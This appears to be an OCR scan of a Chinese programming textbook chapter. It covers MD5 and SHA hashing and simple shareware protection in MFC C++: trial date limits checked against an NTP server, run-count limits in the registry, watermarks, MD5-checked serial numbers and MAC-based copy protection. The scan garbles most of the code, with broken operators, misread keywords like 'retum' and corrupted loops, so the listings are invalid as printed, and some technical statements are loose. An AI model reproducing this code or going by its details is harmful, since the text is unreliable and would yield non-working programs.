摘要 ， 它 并 不 是 一 种 加 密 机 制 ， 但 却 能 产生 信息 的 数字 “指纹 ”， 它 的 目的 是 为 了 确保 数 
据 没 有 被 修改 或 变化 ， 保 证 信息 的 完整 性 不 被 破坏 。 

单 向 散 列 函数 最 主要 的 用 途 是 数字 签名 。 有 具体 过 程 为 : 

0) 甲 先 用 单 向 散 列 函 数 对 某 个 信息 (如 合同 的 电子 文件 )A 进行 计算 , 得 到 128 位 的 结 
果 B， 再 用 私 钥 K 对 B 进行 加 密 ， 得 到 C， 该 数据 串 C 就 是 甲 对 合同 A 的 签名 。 

(2) 他 人 ( 乙 ) 的 验证 过 程 为 ， 乙 用 单 向 散 列 函数 对 A 进行 计算 ， 得 到 结果 B1， 对 签名 
C 用 甲 的 公 钥 K1 进行 加 工 ， 得 到 数据 串 B2， 如 果 B1=B2， 则 签名 是 真 的 ， 反 之 签名 则 为 
假冒 的 。 

常用 的 算法 有 MD5 和 SHA-1. 

MDs 在 20 世 纪 90 年代 初 由 MIT Laboratory for Computer Science 和 RSA Data Security 
Ic 的 Ronald L. Rivest 开发 出 来 ， 经 MD2、MD3 和 MD4 发 展 而 来 。 它 的 作用 是 让 大 容量 
信息 在 用 数字 签名 软件 签署 私人 密 钥 前 被 “压缩 ”成 一 种 保密 的 格式 (就 是 把 一 个 任意 长 度 
的 字 节 串 变换 成 一 个 16 字 节 的 大 整数 ), MD5 被 广泛 用 于 各 种 软件 的 密码 认证 和 钥匙 识别 
上 ， 通 俗 地 讲 就 是 序列 号 。 

安全 a 散 列 算法 SHA(Secure Hash Algorithm, SHA) 是 美国 国家 标准 和 技术 局 发 布 的 国 
家 标准 FIPS PUB 180， 最 新 的 标准 已 经 于 2008 年 更 新 到 FIPS PUB 180-3。 其 中 规定 了 
SHA-1、SHA-224、SHA-256、SHA-384 和 SHA-512 这 几 种 单 向 散 列 算法 。 SHA-1、SHA-224 
和 SHA-256 适用 于 长 度 不 超过 2^64 二 进 制 位 的 消息 。 SHA-384 和 SHA-512 适用 于 长 度 不 
超过 2^128 二 进 制 位 的 消息 。 可 以 对 任意 长 度 的 数据 运算 生成 一 个 20 字 节 的 整数 。 如 图 
1-8 所 示 的 是 单 向 散 列 函 数 的 一 种 常见 用 法 。 


网 上 交易 集成 版 


适用 客户 : 所 有 营业 部 客户 


图 1-8 MDS 应 用 举例 


1. MD5 的 使 用 
#include "md5.h" /本 书 所 附 代 码 
/C++ 使 用 文件 打开 对 话 框 


CFileDialog dlg(TRUE, NULL, NULL, OFN_HIDEREADONLY | OFN OVERWRITEPROMPT 
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| OFN ALLOWMULTISELECT.NULL. this): 
dig.m ofn.IpstrInitialDir = (BSTR)L"C: Program Files": 
/设置 对 话 框 默认 呈现 的 路 径 
dlg.m ofn lpstrFilter-L" 文 本 文件 (*.txb\0*.txt0W0": //L 表示 使 用 宽 字符 
if(dlg.DoModal() != IDOK)retum: 
CString strFilePath-dlg.GetPathName(): // 得 到 文件 名 在 strFilePath 
CFile 印 : 
fp.Open(strFilePath. CFile::modeRead): 
intlen-(int)fp.GetLengthO; — /HOK0FKEE 
int num=len/2048; 
if(len%2048)num++ /循环 的 次 数 
BYTE s[2048]: 
md5 myMds: 
for(int i70; icnum; 1701 
int real-fp.Read(s.2048); 
myMd5. Update(s, real):// 循 环 
) 
myMdsS.FinalizeQ; /结束 
myMds.DigestQ: // 得 到 MDS 187 16 字 节 数组 
fp.Close0: 


2. SHA-1 的 使 用 
完整 代码 见 书 所 附 文件 sha-l.c。 
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本 章 的 重点 是 常用 的 数据 加 密 算法 的 使 用 。 在 后 面 章节 中 ， 都 要 用 到 这 些 算法 ， 尤 其 
是 MD5、AES 和 ECC。 


1.9 习题 


1. 本 书 中 AES 加 密 后 ， 数 据 是 16 字 节 的 倍数 ， 请 模仿 书 中 DES 的 做 法 ， 使 数据 在 
解密 后 恢复 到 原来 的 文件 长 度 。 

2. 能 否 对 上 面 的 算法 进行 组 合 ， 来 完成 数字 签名 ? 

3. 以 上 算法 在 加 密 后 并 不 能 知道 是 用 何 种 算法 加 密 的 , 能 否 在 被 加 密 对 象 中 附加 一 个 
算法 标志 ? 

4. VC 可 以 使 用 类 CFileFind 搜索 一 个 目录 下 的 文件 , 下面 的 代码 是 对 话 框 选择 文件 夹 
和 搜索 文件 夹 。 请 用 一 种 算法 对 选中 的 文件 夹 下 的 某 类 型 文件 加 密 。 


CString m FileDir; 

wchar t szDisplayName[ MAX PATH]: 
BROWSEINFO bi: 

ZeroMemory(&bi, sizeofÁIBROWSEINFO)): 
bihwndOwner =m hWnd: 

//biulFlags = BIF RETURNONLYFSDIRS: 
bi.pszDisplayName = szDisplayName; 
bi.IpszTitle =L" 选 择 一 个 文件 夹 "; 


LPITEMIDLIST pidl = SHBrowseForFolder(&bi); 
BOOL bRet = FALSE: 

TCHAR szFolder[MAX PATH*2]. 

szFolder[0] - T(^0): 

if (pidl) 


{ 


) 


if (SHGetPathFromIDList(pidl, szFolder)) 
bRet = TRUE: 
IMalloc *pMalloc = NULL: 


if (SUCCEEDED(SHGetMalloc(&pMalloc)) && pMalloc) 


£ 
pMalloc->Free(pidl): 
pMalloc-»Release(): 


m FileDir = szFolder;// 选 择 的 文件 夹 路 径 
搜索 文件 夹 代 码 如 下 (没有 考虑 到 搜索 子 文件 夹 ): 


CString DirName="C:\\Program Files\UDG Scaner\had\*.*"; 


CFileFind OneFile; 
CString fName="".name=""; 
BOOL BeWorking: 
BeWorking = OneFile.FindFile( DirName ): 
while ( BeWorking ) { 
BeWorking = OncFile.FindNextFile(): 
if ( 'OncFile.IsDirectory() && !OncFile.IsDots() ) 


{ 


fName-OncFile.GetFilePath(): 
name= OneFile.GetFileName(): 
break: 

) 


OncFile.Close(): 
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本 章 介 绍 如 何 对 应 用 软件 进行 保护 ， 主 要 内 容 如 下 : 

e 简单 实现 软件 的 功能 、 时 间 、 日 期 次 数 、 路 径 限 制 ; 
° 软件 的 防 拷贝 方法 ; 

e ”软件 使 用 序列 号 ; 

e 软件 的 补丁 、 汉 化 ; 

e 软件 的 防 算 改 ; 

° ”软件 的 加 密 。 


2.1 软件 安全 概述 


软件 安全 (Software Security) 是 指 软件 在 受到 恶意 攻击 的 情形 下 依然 能 够 继续 正确 运行 
及 确保 软件 在 授权 范围 内 合法 使 用 。 软 件 安全 在 于 保护 软件 中 的 智力 成 果 、 知 识 产权 不 被 
非法 使 用 ， 包 括 自 改 及 盗用 等 。 研 究 的 内 容 主要 包括 防止 软件 盗版 、 软 件 逆向 工程 、 授 权 
加 密 以 及 非法 算 改 等 。 采 用 的 技术 包括 防 自 改 技术 、 授 权 加 密 技 术 等 方法 。 

共享 软件 是 以 “ 先 试 后 买 ”的 方式 销售 的 具有 版 权 的 软件 ， 根 据 软 件 开发 者 的 授权 ， 
可 以 先 免费 下 载 试 用 共享 软件 的 试用 版 本 ， 认 为 满意 后 再 通过 本 站 向 软件 开发 者 付费 成 为 
注册 用 户 ， 享 用 完整 的 功能 和 服务 ， 本 章 的 内 容 主要 介绍 了 共享 软件 的 保护 。 


22 ”共享 软件 功能 限制 


共享 软件 常用 的 功能 保护 包括 日 期 限制 、 按 钮 或 菜单 功能 限制 、 连 续 运行 时 间 限制 、 
运行 次 数 限制 、 设 置 水 印 等 。 

1. 日 期 限制 

通常 的 做 法 是 安装 程序 预先 将 终止 日 期 设置 在 某 个 位 置 ， 可 以 是 注册 表 、 磁 盘 受 保护 
扇 区 、 某 个 文件 中 。 程 序 每 次 运行 时 ， 先 检测 日 期 。 检 测 日 期 可 以 通过 调用 API 函数 获取 
网 络 时 间 。 

(1) 获取 本 机 时 间 


void GetLocalTime( 
LPSYSTEMTIME lpSystemTime 
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X 
IpSystemTime 是 一 个 SYSTEMTIME 类 型 结构 ， 可 以 得 到 本 机 的 时 间 。 
获取 网 络 时 间 


用 前 面 的 方法 提取 时 间 , 但 用 户 可 以 修改 时 间 , 虽然 可 以 用 HOOK 函数 的 SetLocalTime 

来 禁止 修改 时 间 ， 但 还 是 可 以 修改 BIOS 时 间 。 下 面 的 代码 使 用 套 接 字 向 网 络 时 间 服 务 器 
发 送 请 求 ， 获 取 时 间 。 

struct NTP Packet 

t 

int Control Word: 

int root delay: 

int root dispersion: 

int reference. identifier: 

. intó4 reference timestamp: 

. intó4 originate timestamp: 

. intó4 receive timestamp: 

inttransmit timestamp seconds; 

inttransmit timestamp fractions; 


$£ 


BOOL GetNetTime(SYSTEMTIME &newtime) 
{ 
WORD wVersionRequested: 
WSADATA wsaData; 
/ 初始 化 版 本 
wVersionRequested = MAKEWORD( 1, 1 ): 
if (01-WSAStartup(wVersionRequested, &wsaData)) 
{ 
WSACIeanup0; 
return FALSE: 
) 
if (LOBYTE(wsaData.wVersion)!=1 || HIBYTE(wsaData.wVersion)!=1) 
t 
WSACleanup( ): 
Teturn FALSE: 
) 


/ 这 个 下 是 中 国内 地 时 间 同 步 的 服务 器 地 址 ， 可 自行 修改 。 
SOCKET soc=socket(AF INET.SOCK DGRAM.IPPROTO UDP): 
struct sockaddr in addrSrv: 

addrSrv.sin addr.S un.S addr-inet addr("210.72.145.44"); 
addrSrv.sin family=AF INET: 

addrSrv.sin port-htons(123): 
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NTP Packet NTP SendNTP Recv: 

NTP Send.Control Word = htonl(0x0B000000): 

NTP Send.root delay — 0: 

NTP Send.root dispersion = 0: 

NTP Send .reference identifier = 0: 

NTP Send.reference timestamp — 0: 

NTP Send.originate timestamp = 0: 

NTP_Send receive timestamp = 0: 

NTP_Send.transmit_timestamp_seconds = 0: 

NTP Send.transmit timestamp fractions = 0: 

这 SOCKET ERROR-—sendto(soc.(const char*)&NTP Send.sizeof(NTP Send). 
O.(struct sockaddr*)&addrSrv.sizeof(addrSrv))) 


closesocket(soc): 
return FALSE: 

) 

int sockaddr Size —sizeof(addrSrv); 

iffSOCKET ERROR--recvfrom(soc.(char*)&NTP Recv.sizeof(NTP Recv), 
O. (struct sockaddr*)&addrSrv,&sockaddr Size)) 


closesocket(soc): 
return FALSE; 

) 

closesocket(soc): 

WSACleanup(): 

float Splitseconds; 

struct tm *IpLocalTime: 

time tntp time: 

/ 获取 时 间 服 务 器 的 时 间 

ntp time = ntohl(NTP Recv.transmit timestamp seconds)-2208988800; 

IpLocalTime = localtime(&ntp time): 

if(IpLocalTime — NULL) retum FALSE: 

/ 获取 换算 后 时 间 
newtime.wYear =lpLocalTime->tm year+1900: 
newtime.wMonth -IpLocalTime-^tm mon+1: 
newtime.wDayOfWeek =lpLocalTime->tm wday: 
newtime.wDay -IpLocalTime-^tm mday: 
newtime.wHour -IpLocalTime-^tm hour: 
newtime.wMinute =IpLocalTime->tm min: 
newtime.wSecond -lpLocalTime-^tm sec: 

/ 设置 时 间 精 度 
Splitseconds=(float)ntohl(NTP Recv.transmit timestamp fractions): 
Splitseconds-(foat)0.000000000200 * Splitseconds: 
Splitseconds-(float)1000.0 * Splitseconds: 
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newtime.wMilliseconds = (unsigned short)Splitseconds: 
return TRUE: 
j 
套 接 字 的 知识 可 以 参阅 网 络 安全 一 章 。 
D 读 取 本 机 上 某 个 文件 的 最 后 访问 时 间 
如 果 用 户 不 上 网 ， 就 不 好 取 这 个 日 期 。 先 用 CreateFile 打开 一 个 文件 ， 然 后 即 可 获取 
某 个 文件 的 建立 时 间 、 最 后 访问 时 间 、 最 后 修改 时 间 。 由 于 文件 时 间 格式 的 问题 ， 需 要 调 
用 FileTimeToLocalFileTime 函数 将 文件 时 间 转 成 本 地 时 间 。 


BOOL GetFileTime( 
HANDLE hFile, 
LPFILETIME lpCreationTime. 
LPFILETIME lpLastAccessTime, 
LPFILETIME lpLastWriteTime 
y 
BOOL FileTimeToLocalFileTime( 
const FILETIME* IpFileTime, LPFILETIME lpLocalFileTime ); 


比如 在 QQ 软件 默认 的 图 片 文件 夹 C:\Program Files TencenQQ Users ****Jmage F, 
般 有 个 Thumbs.db 文件 ， 如 果 发 现 有 文件 的 建立 时 间 比 现在 本 机 的 本 机 时 间 早 ， 说 明 用 户 
更 改 了 本 地 时 间 。 
使 用 BOOL CFile::GetStatus( LPCTSTR IpszFileName, CFileStatus& rStatus ) 获 取 时 间 更 
方便 。 可 以 写成 如 下 函数 : 
void GetAFileTime(SYSTEMTIME &newtime) 
£ 
CFileStatus r; 
CString file="C:\\Program Files\\Tencent\\QQ\\Users\\+**+++++*++*\\Tmage\\ 
Thumbs.db"; 
CFile::GetStatus(file.r): 
rm atime.GetAsSystemTime(newtime); /最 后 访问 时 间 
j 
(3) 完整 实现 
找到 应 用 程序 的 初始 化 函数 Initmnstance0， 在 AfSocketInit0 运 行 后 添加 如 下 代码 : 


SYSTEMTIME 11.2.3: 

zGetLocalTime(&tl): HA HERS [i] 

GetNetTime(t2): // 取 网 络 时 间 

GetAFileTime(t3): // 取 文件 时 间 

if(tl.wYear>2012 && tl.wMonth>3 && tl.wDay>20)retum 0: 
if(t2.wYear>2012 && t2.wMonth>3 && t2.wDay>20)return 0: 
if(t3.wYear>2012 && t3.wMonth>3 && t3.wDay>20)return 0: 
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注意 : 

在 程序 初始 化 时 要 选中 套 接 字 。 完 整 程序 见 “日 期 限制 演示 程序 "。 

2. 连续 运行 时 间 限 制 

连续 运行 时 间 限 制 是 指 从 程序 开始 运行 ， 运 行 到 一 定 的 时 间 后 ， 可 能 退出 程序 或 限制 
某 些 功能 的 使 用 。 连 续 运行 时 间 限 制 一 般 通 过 定时 器 实现 。 

(1) 添加 定时 器 消息 函数 

添加 定时 器 消息 函数 的 操作 如 图 2-1 所 示 。 


[13 s I লায়ন 


IDD NY DIALOG (Dialog) IDlgEditor - 
EL n fe] n 
YW STSKETVP ^ 
Yw TCARD 
WM THEMECHANGED. 
š 


š 
š 
: 
14 


2-1 添加 定时 器 消息 函数 


Q) 建立 定时 器 
BOOL C 连续 运行 时 间 限 制 函数 如 下 : 


Dlg::OnInitDialogO 
CDialog::OnlnitDialog(: 
Seücon(m hlcon TRUE); — // 设置 大 图 标 
Setlcon(m hlcon FALSE): —// 设置 小 图 标 
// TODO: 在 此 添加 额外 的 初始 化 代码 
SetTimer(1.60000.NULL) : /定时 器 60000 毫秒 运行 一 次 
retum TRUE: // 除非 将 焦点 设置 到 控件 ， 否 则 返回 TRUE 
} 


(3) 添加 时 间 检 查 代 码 

void C 连续 运行 时 间 限 制 函数 的 代码 如 下 : 
Dlg::OnTimer(UINT PTR nIDEvent) 
( 


11 TODO: 在 此 添加 消息 处 理 程序 代码 和 /或 调用 默认 值 
static int timeout-30: 
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if(timeout—0)::ExitProcess(0): 
timeout--; 
CDialog::OnTimer(nIDEvent): 
) 
上 面 的 程序 在 连续 运行 半 小 时 后 自动 退出 。 
3. 按钮 或 菜单 功能 限制 
下 面 的 两 个 API 函数 可 以 实现 按钮 或 菜单 的 使 能 和 变 灰 。 


BOOL EnableWindow( HWND hWnd. BOOL bEnable ): 
/hWnd 是 窗口 句柄 ，bEnable=FALSE， 按 钮 变 灰 ， 否 则 变 亮 


BOOL EnableMenultem( 
HMENU hMenu, 
UINT uIDEnableItem, 
UINT uEnable 

y 


hMenu 是 菜单 句柄 ，uIDEnableItem 是 菜单 子 项 的 ID，uEnable 决定 是 否 使 能 。 

4. 运行 次 数 限制 

只 允许 运行 若干 次 。 次 数 可 以 先 由 安装 程序 写 在 磁盘 的 某 个 位 置 。 比 如 某 文件 中 、 磁 
盘 扇 区 或 注册 表 。 下 面 是 将 次 数 放 在 注册 表 的 例子 ， 主 要 代码 如 下 : 


BOOL CTimesApp::InitInstance() 
t 
HKEY key: 
long re-RegOpenKeyEx(HKEY LOCAL MACHINE."SOFTWARE Microsoft 
WindowsWCurrentVersion", 0.KEY ALL ACCESS.&key): /打开 注册 表 
ifre'-ERROR. SUCCESS)( 
:MessageBox(0." 打 开 键 失败 "." 提 示 错 误 ".MB_OK); 
return 0; } 
DWORD times-4.type-0.len: 
/查询 注册 表 SOFTWARE Microsoft Windows CurrentVersion 下 的 times 
re-RegQueryValueEx(key."times".0.&type.(LPBYTE)(&times).&len): 
ifrel=ERROR_SUCCESS){/ 若 不 存在 ， 说 明 是 首次 运行 ， 设 置 次 数 为 4 
:MessageBox(0." 欢 迎 使 用 ， 最 多 5 次 "" 提 示 ".MB_OK); 
zRegSetValueEx(key."times".0.REG DWORD (unsigned char *)(&times). 
sizeofiDWORD)): 
} 
else{ 
// 次 数 减 1， 判 断 是 否 为 0 
times--; 
这 times 一 0){ 
::MessageBox(0." 次 数 已 到 ， 不 能 使 用 "." 提 示 ".MB_ORK): 
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zRegCloseKey(key): /到 0 了 ， 直 接 退 出 
retum 0: ) 
zRegSetValucEx(key."times".0.REG DWORD.(unsigned char *)(&times).4): 
CString inf 
infFormat(" 剩 余 次 数 %d".times): 
:MessageBox(0.inf "提示 "MB_OK): /提示 剩余 次 数 。 


} 
zRegCloseKey(key): 
这 段 代 码 要 放 在 应 用 程序 初始 化 方法 mitmstance0 中 ， 运 行 时 界面 如 图 2-2 所 示 。 
名 称 类 型 


数据 
MERRE) 
C:\Program Files\Common F 


C: WINDOS edi a 
XSystenRootMledi a 


AIS038C2-6A00-44C3-AEFC-E 
BC239B41-9E98-4d70-96EB-5 
76481-640-8634005-23467 
C:\Progran Files 
XProgranFilesk 


附件 
设 定 程序 访问 和 默认 值 
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5. 设置 水 印 

比如 某 扫描 控件 为 正 所 调用 ， 用 于 控制 扫描 仪 的 扫描 。 如 果 该 控件 没有 注册 ， 在 扫 
描 10 次 后 ， 将 在 扫描 的 图 片 中 显示 水 印 。 添 加 水 印 可 以 在 函数 OnPaint0 中 通过 调用 下 面 
的 API 实现 。 


BOOL ExtTextOut( 
HDC hdc, /| 设备 句柄 
int X. UE 输出 的 横 坐标 
int Y. / 输出 的 纵 坐 标 
UINT fuOptions, U 文本 输 选 项 
CONST RECT* Iprc. 
LPCTSTR IpString, // 字符 串 
UINT cbCount. / 字符 数 
CONST INT* IpDx 

k 

整个 操作 过 程 如 下 : 


0) 设置 全 局 变量 ， 分 别 为 整 型 nam， 用 来 表示 已 经 打开 的 图 片 数 ， 初 始 化 为 0， 打 开 
的 文件 名 为 CString 类 型 fname. 
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O) 添加 画图 函数 
void C 添加 水 印 Dlg::ShowPicture(char *lpstrFile.HWND hWnd) 
{ 
// 显 示 图 片 ，IpstrFile 为 图 片 文件 名 ，hWnd 为 窗口 句柄 
HDC hDC_Temp=::GetDC(hWnd): 
TPicture *pPic; 
IStream *pStm: 
BOOL bResult; 
HANDLE hFile=NULL: 
DWORD dwFileSize.dwByteRead:; /打开 图 形 文件 
hFile-CreateFile(IpstrFile.GENERIC READ.FILE SHARE READ.NULL, 
OPEN EXISTING.FILE ATTRIBUTE NORMAL NULL): 
if(hFile'-INVALID HANDLE VALUE){ 
dwFileSize-GetFileSize(hFile.NULL)://3k 3c fF 38 
if (dwFileSize—O0xFFFFFFFF) return: 
} 
else 
return ; 
/分 配 全 局 存储 空间 
HGLOBAL hGlobal = GlobalAllo(GMEM MOVEABLE, dwFileSize): 
LPVOID pvData = NULL; 
if (hGlobal — NULL) return: 
if ((pvData = GlobalLock(hGlobal)) 一 NULL)// 锁 定 分 配 内 存 块 
retum ; 
ReadFile(hFile.pvData.dwFileSize.&dwByteReadNULL):// 把 文件 读 入 内 存 缓冲 区 
GlobalUnlock(hGlobal): 
CreateStreamOnHGlobal(hGlobal, TRUE, &pStm); // 装 入 图 形 文件 
bResult=OleLoadPicture(pStm.dwFileSize.TRUE.IID IPicture,(LPVOID*)é&pPic); 
if(FAILED(bResult)) return ; 
OLE XSIZE HIMETRIC hmWidth; /图 片 的 真实 宽度 . 单位 为 英寸 
OLE YSIZE HIMETRIC hmHeight; /图 片 的 真实 高 度 . 单位 为 英寸 
pPic->get_Width(&hmWidth): 
pPic->get_Height(&hmHeight): /转换 hmWidth 和 hmHeight 为 pixels 距离 
int nWidth = MulDiv(hmWidth.GetDeviceCaps(hDC Temp.LOGPIXELSX).2540): 
int nHeight = MulDiv(hmHeight.GetDeviceCaps(hDC Temp.LOGPIXELSY).2540): 
/将 图 形 输出 到 屏幕 上 (有 点 像 BitBlD 
bResult-pPic--Render(hDC Temp.0.0.n Width/4.nHeight/4, 
O.hmHeight.hmWidth.-hmHeight.NULL): 
pPic-^Release(): 
CloseHandle(hFile);// 关 闭 打开 的 文件 
if (SUCCEEDED(bResuld) í 
return: } 
else { 
retum: } 
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(3) 添加 选取 图 片 文件 的 函数 如 下 : 


void C 添加 水 印 Dlg::OnBnClickedButton10 
{ 
CFileDialog dle(TRUE, NULL. NULL. OFN HIDEREADONLY | OFN OVERWRITEPROMPT | 
OFN ALLOWMULTISELECT.NULL. this): 
dig.m ofn.IpstrinitialDir = "E: docs photo fa": 
dlg.m ofn.IpstrFilter-"jpg Files(* jpg) 0* jpg 0bmp Files(*.bmp)0*.bmp'0 
All Files(*.*)\0*.*\0\0"; 
if(dlg.DoModalQ!-IDOK) return: 
fname-dlg.GetPathiName(): 
num++; 
this->Invalidate0; 
) 


(4) 在 OnPaint0 中 添加 显示 图 片 和 水 印 的 代码 如 下 : 


if(fname!="")ShowPicture((char*)fname.GetBuffer(0).this->m hWnd): 
if(num>=5){ 
HDC hdc; 
hdc = ::GetDC(this->m_hWnd);// 获 得 设备 句柄 
::SetTextColor(hdc.RGB(255,0,0)): 
char *in 伟 "请 您 注册 ， 联 系 QQ 12345678"; 
zExtTextOut(hdc, 50, 140, ETO CLIPPED, NULL inf, strlen(inf), NULL); 
} 
完整 的 程序 见 “添加 水 印 ”。 程 序 显示 如 图 2-3 所 示 。 


2, 添加 水 印 


2-3 水 印 演示 


23 软件 的 序列 号 


在 安装 软件 时 ， 一 般 需 要 输入 序列 号 才能 进行 安装 。 每 个 软件 通常 有 一 个 序列 号 。 软 
件 的 序列 号 由 另 一 个 程序 生成 。 安 装 软 件 时 ， 需 要 将 输入 的 序列 号 与 软件 中 已 经 保存 的 序 
列 号 或 序列 号 经 过 加 密 的 值 进行 比较 。 本 节 先 模拟 生成 序列 号 ， 然 后 得 到 序列 号 的 MDS 
值 ， 安 装 程序 中 保留 了 这 个 MDS 值 ， 当 用 户 安装 软件 时 ， 要 输入 序列 号 ， 如 果 用 户 输入 
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错误 ， 则 提示 错误 并 终止 安装 。 
1. 模拟 生成 注册 码 


界 


面 如 图 2-4 所 示 。 


fl HELE EFS 


fone 157০০ [eer [pozzr 83730 


Md5 值 [B92FB68CE2726307C33FAT 7E23D58367 


চি 


图 2-4 生成 注册 码 


这 里 要 运用 到 第 1 章 的 MDS 算法 。 图 2-4 的 第 一 列 控件 是 5 个 编辑 框 ， 名 称 分 别 为 
m_el~m_e5， 第 二 列 的 编辑 框 为 上 面 5 个 编辑 框 中 字符 串 的 MDS 值 。 这 里 序列 号 用 随机 
数 生成 模拟 生成 序列 号 的 函数 如 下 : 


void C 模拟 生成 序列 号 Dlg::OnBnClickedButton10 

{ 
BYTE key[5]: 
CString sl1,s2,s3,s4,s5; 
srand( (unsigned)time( NULL ) ): 
for(int i70; i<5; it+)key[i]=(BYTE) rand()?616; 
s1.Format("%01X%01X%01X%01X%01X" key[0] key[1] key[2] key[3] key[4]): 
m el.SetWindowTextA(s1): /生成 第 1 个 编辑 框 中 字符 
for(int i=0; i<5; i++)key[i]=(BYTE) rand0%16: 
s2.Format("%01X%01X%01X%01X%01X".key[0] key[1] key[2] key[3] key[4]): 
m e2SetWindowTextA(s2): 。“ // 生 成 第 2 个 编辑 框 中 字符 
for(int i=0; i<5; it+)key[i]=(BYTE) rand0%16: 
s3.Format("%01X%01X%01X%01X%01X".key[0] key[1] key[2] key[3] key[4]): 
m e3SetWindowTextA(s3): 。“// 生 成 第 3 个 编辑 框 中 字符 
for(int i=0; i<5: iz+)key[i]=(BYTE) rand0%16: 
s4.Format("%01X%01X%01X%01X%01X".key[0].key[1] key[2] .key[3].key[4]): 
m e4.SetWindowTextA(s4): /生成 第 4 个 编辑 框 中 字符 
for(int i=0; i<5: it-)key[i]Ü(BYTE) rand()%16: 
s5.Format("%01X%01X%01X%01X%01X".key[0] key[1] key[2] .key[3].key[4]): 
m e5.SetWindowTextA(s5): /生成 第 5 个 编辑 框 中 字符 
CString s=sl+s2+s3+s4+s5; IS 个 字符 串 的 和 

md5 myMd5: 

uchar p[16]={0}: 

myMd5.Update((uchar*)s.GetBuffer(0).s.GetLengthO): 

myMdsS.Finalize(): 

memcpy(pmmyMdsS.Digest).16): 。“// 得 到 5 个 字符 串 的 MD5 fH 
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s.Format("%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X 
%02X%02X", 
p[olp[]p[2].p[3].p[4].p[5]p[6]p[7]p[8]p[9]p[10]p[11]p[12].p[13].p[14].p[15]): 
m eMdsS.SetWindowTextA(s): 
) 


2. 生成 安装 程序 

安装 程序 如 图 2-5 所 示 ， 其 中 有 5 个 编辑 框 ， 用 来 输入 序列 号 。“ 安 装 ”按钮 对 应 的 
函数 用 来 计算 和 比较 序列 号 。 添 加 5 个 编辑 框 的 变量 ， 分 别 为 m_el 到 m_e5， 模 拟 序列 号 
安装 程序 的 代码 如 下 : 


void C 模拟 序列 号 安装 程序 Dlg::OnBnClickedButton10 

{ 

CString realMd5="SFF6A2CADSA06C2F480EF1E8813D3356"; 

/这 是 从 序列 号 生成 程序 中 复制 过 来 的 字符 串 

CString 51,52.53,54,55; 

m el.GetWindowTextA(sl); 

m e2.GetWindowTextA(s2): 

m e3.GetWindowTextA(s3): 

m e4.GetWindowTextA(s4): 

m e5.GetWindowTextA(s5): 

CString s=sl+s2+s3+s4+s5; 

10005100105: 

uchar p[16]={0}; 

myMdsS.Update((uchar*)s.GetBuffer(0).s.GetLength()): 

myMdsS.Finalize(): 

memcpy(p.myMdsS.Digest().16); 

s.Format("%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X 
%02X%02X", 

p[0]p[1].p[2] p[3] p[4].p[S].p[6]p[7]p[8] p[9] p[10] p[11].p[12] p[13] p[14] p[15]): 

if(s—realMd5) 

MessageBox(" 序 列 号 正确 "); 

else 

MessageBox(" 序 列 号 错误 "): 

j 


[LIII 


请 输入 序列 号 


|ccvw |woro [FFEER [RRTTG [TRTFR 


图 2-5 模拟 安装 程序 
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3. 模仿 其 他 功能 


为 了 尽量 模仿 安装 程序 ， 编 辑 框 一 般 只 允许 输入 大 写字 母 或 数字 ， 每 个 只 输入 5 个 字 
符 。 为 了 限制 输入 长 度 ， 在 OnInitDialog0 中 输入 下 面 5 行 代码 ， 以 限制 长 度 : 
m el.SetLimitText(5): 
m e2.SetLimitText(5): 
m e3.SetLimitText(5): 
m e4.SetLimitText(5): 
m e5.SetLimitText(5): 

输入 的 字母 一 般 为 大 写 。 单 击 编辑 框 ， 设 置 其 属性 Uppercase 为 TRUE. 

当 输 入 序列 号 时 ， 如 果 已 经 输入 了 5 个 字符 ， 再 输入 时 ， 光 标 会 自动 跳 到 下 个 编辑 框 。 
选择 编辑 框 ， 右 键 选择 添加 事件 处 理 程序 ， 选 择 EN_CHANGED， 得 到 事件 处 理 函数 ， 添 
加 代码 如 下 ， 表 示 如 果 长 度 为 5 了 ， 若 再 输入 ， 光 标 会 自动 跳 到 下 个 编辑 框 。 

void C 模拟 序列 号 安装 程序 DIg::OnEnChangeEdit2() 

{ 
CString s; 
m e2.GetWindowTextA(s): 
if(s.GetLength()—5)m e3.SetFocusQ; // 设 置 焦点 到 下 个 编辑 框 


24 软件 的 防止 拷贝 


软件 防 拷贝 主要 是 为 了 防止 软件 被 非法 从 一 台 计算 机 拷贝 或 被 克隆 到 其 他 机 器 。 通 用 
原理 是 ， 安 装 程序 获取 该 台 计算 机 的 硬件 唯一 值 ， 可 以 是 CPU 的 序列 号 、 网 卡 的 MAC 地 
址 、 硬盘 的 序列 号 等 ， 写 入 到 某 个 位 置 。 应 用 程序 运行 时 ,提取 所 在 计算 机 的 硬件 唯一 值 ， 
读 取保 存 的 硬件 唯一 值 ， 两 者 相 比 较 ， 相 等 才 正 常 运行 。 如 果 软 件 被 克隆 到 男 一 台 机 器 ， 
硬件 的 唯一 值 肯定 不 相同 。 

本 节 以 获取 计算 机 网 卡 的 MAC 值 为 唯一 值 来 实现 。 

1. 取 网 卡 MAC 代码 


#include <Iphlpapi.h> 
#pragma comment(lib."Iphlpapi.lib") 
IP_ADAPTER INFO m AdapterInfo[16]://Allocate information 
PIP ADAPTER INFO m pAdapterInfo;//Contains pointer to 
BOOL GetNextMac(LPSTR szMac) 
t 
if(NULL!-m pAdapterInfo) 
Š 
sprintf(szMac."%02X-%02X-%02X-%02X-%02X-%02X". 
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m pAdapterInfo->Address[0]. 
m pAdapterInfo->Address[1]. 
m pAdapterInfo->Address[2]. 
m pAdapterInfo->Address[3]. 
m pAdapterInfo->Address[4]. 
m pAdapterInfo->Address[5]): 
m pAdapterInfo=m pAdapterInfo->Next://Progress through linked list 
retum TRUE: 
) 
else retum FALSE: 
) 
BOOL  GetFirstMac(LPSTR szMac) 
t 
DWORD dwBufLen=sizeofím_AdapterInfo)://Save memory size of buffer 
DWORD dwsStatus-GetAdaptersInfo(m AdapterInfo.&dwBufLen): 
if(dwStatus!-ERROR SUCCESS) retum FALSE: 
m pAdapterInfo-m AdapterInfo: 
retum TRUE;  //GetNextMac(szMac): 
) 


2. 写 入 网 卡 MAC 代码 


void C 防 拷贝 安装 程序 Dlg::OnBnClickedButton10 
€ 
char mac[12]: 
GetFirstMac(mac); 
CFile fp: 
fp.Open("C:\\windows\\unique", CFile::modeRead Write): 
fp.Write(mac,12): 
fp.CloseQ: 
) 


这 里 把 MAC 值 写 到 Windows 目录 下 ， 既 没有 加 密 ， 也 没有 校 验 ， 肯 定 不 合适 。 
